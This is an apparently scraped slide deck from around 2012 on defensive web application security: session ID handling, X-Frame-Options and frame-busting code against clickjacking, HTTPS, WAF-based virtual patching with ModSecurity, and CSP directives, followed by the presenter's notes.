    [8] Session Defenses – Ensure secure session IDs • 20+ bytes, cryptographically random • Stored in HTTP Cookies • Cookies: Secure, HTTP Only, limited path • No Wildcard Domains – Generate new session ID at login time • To avoid session fixation – Session Timeout • Idle Timeout • Absolute Timeout • Logout Functionality
  • 38.
  • 42.
    [9] X-Frame-Options // to prevent all framing of this content response.addHeader( "X-FRAME-OPTIONS", "DENY" ); // to allow framing of this content only by this site response.addHeader( "X-FRAME-OPTIONS", "SAMEORIGIN" ); // to allow framing from a specific domain response.addHeader( "X-FRAME-OPTIONS", "ALLOW-FROM X" );
  • 43.
    Legacy Browser ClickjackingDefense <style id="antiCJ">body{display:none !important;}</style> <script type="text/javascript"> if (self === top) { var antiClickjack = document.getElementByID("antiCJ"); antiClickjack.parentNode.removeChild(antiClickjack) } else { top.location = self.location; } </script>
  • 44.
    [10] Encryption in Transit (HTTPS/TLS) – Authentication credentials and session identifiers must be encrypted in transit via HTTPS/SSL • Starting when the login form is rendered • Until logout is complete • CSP and HSTS can help here – https://www.ssllabs.com free online assessment of public-facing server HTTPS configuration – https://www.owasp.org/index.php/Transport_Layer_Protecti on_Cheat_Sheet for HTTPS best practices
  • 45.
    and love the WAF
  • 46.
    [11] Virtual Patching “A security policy enforcement layer which prevents the exploitation of a known vulnerability”
  • 47.
    Virtual Patching Rationale forUsage – No Source Code Access – No Access to Developers – High Cost/Time to Fix Benefit – Reduce Time-to-Fix – Reduce Attack Surface
  • 48.
    Strategic Remediation • Ownershipis Builders • Focus on web application root causes of vulnerabilities and creation of controls in code • Ideas during design and initial coding phase of SDLC • This takes serious time, expertise and planning
  • 49.
    Tactical Remediation • Ownershipis Defenders • Focus on web applications that are already in production and exposed to attacks • Examples include using a Web Application Firewall (WAF) such as ModSecurity • Aim to minimize the Time-to-Fix exposures
  • 50.
    OWASP ModSecurity CoreRule Set (CRS) http://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project
  • 51.

Editor's Notes

  • #8 December 17, 2012 ©2007 Ernst &amp; Young Advanced Security Center
  • #9 December 17, 2012 ©2007 Ernst &amp; Young Advanced Security Center
  • #10 December 17, 2012 ©2007 Ernst &amp; Young Advanced Security Center CVE-2012-2660/2661/2694 Active record 3.0 and later for Ruby on Rails is vuln to Fixed in RoR 3.2.5, 3.1.5, 3.0.13 Rails 2.3.x is vilnerable to various injections that have NOT been patched and will N:OT be patched so please don ’ t use it
  • #11 December 17, 2012 ©2007 Ernst &amp; Young Advanced Security Center
  • #12 December 17, 2012 ©2007 Ernst &amp; Young Advanced Security Center
  • #13 December 17, 2012 ©2007 Ernst &amp; Young Advanced Security Center linq writes parametrized, precompiled queries. This is the reason why SQL injection is not effective on linq generated queries. The linq generated query is shown below.
  • #17 Bcrypt is such a slow hashing algorithm. A speed comparison on a MacBook Pro with 2 Ghz Intel Core 2 Duo: SHA-1: 118,600 hashes per second. Bcrypt (with cost = 10): 7.7 hashes per second.
  • #28 Note: The issue with $() is being worked on and will hopefully be much harder to exploit in jQuery 1.8
  • #29 CREDIT THIS TO DAVE WICHERS. Note: The issue with $() is being worked on and will hopefully be much harder to exploit in jQuery 1.8
  • #30 1 -
  • #31 Need to expand this section!
  • #34 connect-src limits the origins to which you can connect (via XHR, WebSockets, and EventSource). font-src specifies the origins that can serve web fonts. Google’s Web Fonts could be enabled via font-src https://themes.googleusercontent.com frame-src lists the origins that can be embedded as frames. For example: frame-src https://youtube.com would enable embedding YouTube videos, but no other origins. img-src defines the origins from which images can be loaded. media-src restricts the origins allowed to deliver video and audio. object-src allows control over Flash and other plugins. style-src is script-src’s counterpart for stylesheets. By default, directives are wide open. If you don’t set a specific policy for a directive, let’s say font-src, then that directive behaves by default as though you’d specified * as the valid source (e.g. you could load fonts from everywhere, without restriction). You can override this default behavior by specifying a default-src directive.
  • #35 December 17, 2012 ©2007 Ernst &amp; Young Advanced Security Center
  • #36 December 17, 2012 ©2007 Ernst &amp; Young Advanced Security Center
  • #38 &gt; OUTLINE &gt; &gt; 1) Authentication, session management, and access control &gt;    - Pre and post authentication session IDs &gt;    - Session ID (temporary) equivalent to the strongest authentication method &gt;    (point to authentication cheatsheet) &gt; &gt; 2) Session ID secure properties &gt; 2.1) Session ID name fingerprinting &gt; 2.1) Session ID length &gt; 2.2) Session ID entropy &gt; 2.3) Session ID content &gt; 2.4) Cryptographically strong session id &gt; 2.5) Recommendations for a secure session management database &gt; &gt; 3) Session ID exchange mechanisms &gt; 3.1) Used vs. accepted session ID exchange mechanisms &gt; &gt; 4) Session ID sent via cookies &gt; 4.1) HTTPonly cookies &gt;    (point to XSS cheatsheet) &gt; 4.2) Secure cookies &gt;    (point to TLS cheatsheet) &gt; 4.3) Domain and path cookie attributes &gt; 4.4) Expire attribute &gt; 4.5) CSRF implications of cookies &gt;    (point to CSRF cheatsheet) &gt; 4.6) Cross-Site Tracing (XST) prevention &gt; 4.7) HTTP response splitting prevention &gt; 4.8) Cookie META tag prevention ???? &gt; &gt; 5) Session ID initial verification &gt; 5.1) Permissive and strict session management &gt; 5.2) Treat session ID as any other user input &gt; &gt; 6) Renew the session ID after any privilege level change &gt; &gt; 7) Session expiration (on both client and server) &gt; 7.1) Automatic session expiration &gt; 7.1.1) Idle timeout &gt; 7.1.2) Absolute timeout &gt; 7.2) Manual session expiration &gt; 7.2.1) Logout button &gt; 7.2.2) Javascript logout on window close &gt; 7.2.3) Features for disabling session cross-tab &gt; &gt; 8) Session hijacking detection &gt; 8.1) Binding the session ID to other user properties &gt; 8.2) Logging: Monitoring creation, life cycle, and destruction of session IDs &gt; 8.3) Are multiple simultaneous logons allowed? &gt; 8.4) Session management WAF protections &gt;
  • #44 Put this all in the HEAD tag